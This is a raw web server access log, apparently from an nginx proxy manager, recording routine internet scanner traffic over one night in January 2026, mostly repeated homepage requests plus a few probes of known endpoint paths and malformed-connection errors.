+[25/Jan/2026:18:28:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:18:41:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:18:51:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:18:55:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.92.226.187] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[25/Jan/2026:18:55:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:19:00:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:02:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 51.112.144.31] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[25/Jan/2026:19:05:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:08:58 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:19:10:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:19:13:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:20:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:19:29:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:38:55 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:39:50 +0000] 400 - - http localhost "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:19:39:50 +0000] 400 - - http localhost "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:19:46:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:56:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:19:57:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:00:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:20:00:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:15:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:20:19:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:25:18 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:27:52 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:20:31:00 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:20:34:27 +0000] 400 - - http localhost "-" [Client 149.102.244.50] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:20:36:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 149.102.244.50] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:20:40:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.154] [Length 0] [Gzip -] "-" "-" +[25/Jan/2026:20:41:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:45:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:47:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:20:50:28 +0000] 400 - - http localhost "-" [Client 20.163.15.225] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:20:54:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:20:58:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:21:07:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:11:54 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:12:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:16:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 59.173.109.111] [Length 1033] [Gzip -] "-" "-" +[25/Jan/2026:21:17:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:21:17:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 122.96.28.44] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[25/Jan/2026:21:36:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:36:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:38:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:41:50 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:57:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:21:58:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.164] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:21:58:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.164] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:21:59:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:00:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:07:27 +0000] 404 - GET http 91.82.215.191 "/developmentserver/metadatauploader" [Client 20.169.53.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[25/Jan/2026:22:10:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:22:21:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:22:26:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:34:35 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:34:38 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:34:41 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:34:44 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:34:45 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:34:48 +0000] 400 - POST http 91.82.215.191 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:34:51 +0000] 400 - POST http 91.82.215.191 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:34:55 +0000] 400 - GET http 91.82.215.191 "/WuEL" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[25/Jan/2026:22:34:57 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:34:59 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:22:35:00 +0000] 400 - GET http 91.82.215.191 "/a" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:35:03 +0000] 400 - GET http 91.82.215.191 "/download/file.ext" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:35:07 +0000] 400 - GET http 91.82.215.191 "/SiteLoader" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:35:11 +0000] 400 - GET http 91.82.215.191 "/mPlayer" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:35:16 +0000] 400 - POST http 91.82.215.191 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:35:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:35:20 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.91.69.5] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[25/Jan/2026:22:36:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:41:54 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:51:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:22:51:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:00:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:23:15:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:21:39 +0000] 404 - POST http 91.82.215.191 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.215.191:80/home.asp" +[25/Jan/2026:23:25:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:27:09 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:28:08 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[25/Jan/2026:23:32:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:37:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 15.206.68.43] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[25/Jan/2026:23:40:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:23:48:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:23:55:45 +0000] 400 - GET http 91.82.215.191 "/" [Client 40.80.206.136] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[25/Jan/2026:23:55:46 +0000] 400 - - http localhost "-" [Client 40.80.206.136] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:00:01:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:05:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:10:32 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:15:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:27:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:28:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.227.254.155] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:00:33:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:33:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:00:36:27 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:00:49:37 +0000] 404 - GET http 91.82.215.191 "/hudson" [Client 20.163.15.131] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[26/Jan/2026:00:52:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:58:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:00:59:13 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:03:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:20:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:22:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:01:22:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:44:44 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:48:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:49:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:01:53:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:10:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:10:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:24:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:02:30:51 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:36:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:38:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:43:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 142.248.80.192] [Length 0] [Gzip -] "-" "-" +[26/Jan/2026:02:48:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:02:49:54 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:02:55:14 